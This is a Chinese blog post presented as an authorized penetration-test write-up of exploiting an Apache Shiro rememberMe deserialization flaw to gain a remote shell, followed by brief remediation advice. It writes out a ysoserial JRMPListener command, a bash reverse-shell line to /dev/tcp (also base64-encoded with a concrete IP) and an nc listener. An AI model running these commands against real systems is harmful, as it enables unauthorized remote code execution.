实战渗透-Shiro反序列化漏洞实例

偏执的太偏执、 2022-10-21 14:50 310阅读 0赞

# 0x01.前言 #

这是一次授权的渗透测试，技术含量不高，但我始终相信，每一次的积累，都是为了成就更好的自己，所以过程简洁，记录下每个知识点。对渗透而言，我更喜欢实战的体验感，那种喜悦和知识的获取感，永远是无法比拟的。这次实战，最多的还是收获，拿下此战，进而渗透更多的站来获取不同的细节，不懂的话你就品一下。

# 0x02.渗透过程 #

这篇文章没有前期的信息收集，省略过了一切，直接开始我们渗透。

## 1）网站环境 ##

域名：http://manage.xxxxxx.org.cn/xxx/login.jsp

程序语言:jsp

这仅仅是一个登录框的测试。

![图片][f2a4654a0fb88d350187d13291197f77.png]

## 2）探测登录框架 ##

开启神奇Burp，抓包，通过返回包的情况来进行分析(敏感信息打码)

![图片][b14f2900437485d1b81546fa2045511f.png]

## 3）步入洞点 ##

当看到关键字rememberMe=deleteMe;, 你是否就会想起Shiro反序列化漏洞，那么我们现在用实验室的集成脚本进行测试，是否存在Shiro反序列化漏洞。这里相当于先提供POC测试。

首先burp做监听器:

![图片][6a124aa668a648a1291d44c88011fb2b.png]

然后使用脚本进行测试：

![图片][9a6689df37e7d604c03930931c0d51c7.png]

![图片][44e05948d57059fbec502a9127b9d605.png]

经过测试，是存在Shiro反序列化漏洞的。

## 4）深入探测Shiro反序列化漏洞 ##

这边的目的，就是危害最大程度，那么我就继续进行测试，最严重的模式，也就是直接拿到主机shell，这边也提供最详细的操作，以及遇到的一些坑点作为分享。

思路：一台公网的vps做监听，配合burp发送payload，然后获取shell。

### 1.在公网 vps 执行下列命令： ###

> java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1066 CommonsCollections5

“反弹shell的命令”

这里的命令，需要使用 Java Runtime 配合 bash 编码。

> bash -i > /dev/tcp/ip/port 0>& 1

最终执行命令为:

> java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1066 CommonsCollections5 “bash -c \{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8yMTIuNjQuODcuMy8xMjM0IDA+JiAx\}|\{base64,-d\}|\{bash,-i\}”

这里的CommonsCollections，分为1-10模块进行测试，这边使用模块5进行渗透。

### 2.使用 exp 生成 payload ###

Python exp.py 公网ip：port（这边有一点要避雷）

![图片][00017304a338459ac80e2ab362d2542c.png]

### 3.公网 vps 开启 nc 监听 ###

Nc -lvp 1234    (监听1234端口)

![图片][37cee8f2b11a99c2ed34ec14ab4e55d3.png]

### 4.抓任意 http 数据包，在 cookie 中追加 payload。GoGoGo ###

![图片][dfc91d75d32a0dec3f8ce4bcc35d12f4.png]

### 5.成功拿到shell ###

![图片][8edd21da15231833e8cf561a0cb8aefe.png]

# 0x03.修复方案 #

升级 Shiro 版本至 1.2.5 以上；更改默认密钥。

# 0x04.总结 #

1.了解基本的网站架构;

2.抓包探测确定中间件;

3.了解各类中间件和框架的漏洞;

4.熟悉并熟练掌握Shiro漏洞的利用方式;

5.熟悉nc的使用方法;

6.多积累，多学习，多联系.

[f2a4654a0fb88d350187d13291197f77.png]: /images/20221021/fd4ea65767df4c15996065b2e5b1d166.png
[b14f2900437485d1b81546fa2045511f.png]: /images/20221021/d949c835156643e585c813da817d0f15.png
[6a124aa668a648a1291d44c88011fb2b.png]: /images/20221021/15fe9b97a21740f382e00dd161e3d76f.png
[9a6689df37e7d604c03930931c0d51c7.png]: /images/20221021/60a1cf222cb44c969eb028ebb42347c1.png
[44e05948d57059fbec502a9127b9d605.png]: /images/20221021/6c3ffcd829684d999047ce9581f6bda6.png
[00017304a338459ac80e2ab362d2542c.png]: /images/20221021/31c4531888c2477c839ac8e2c648b527.png
[37cee8f2b11a99c2ed34ec14ab4e55d3.png]: /images/20221021/10258047e65846bd81f02fe8dc18efa7.png
[dfc91d75d32a0dec3f8ce4bcc35d12f4.png]: /images/20221021/e3919259f83d49e3adfb5346c3f03a4c.png
[8edd21da15231833e8cf561a0cb8aefe.png]: /images/20221021/9ec066f8900d4fd2a5775411f1aed2d1.png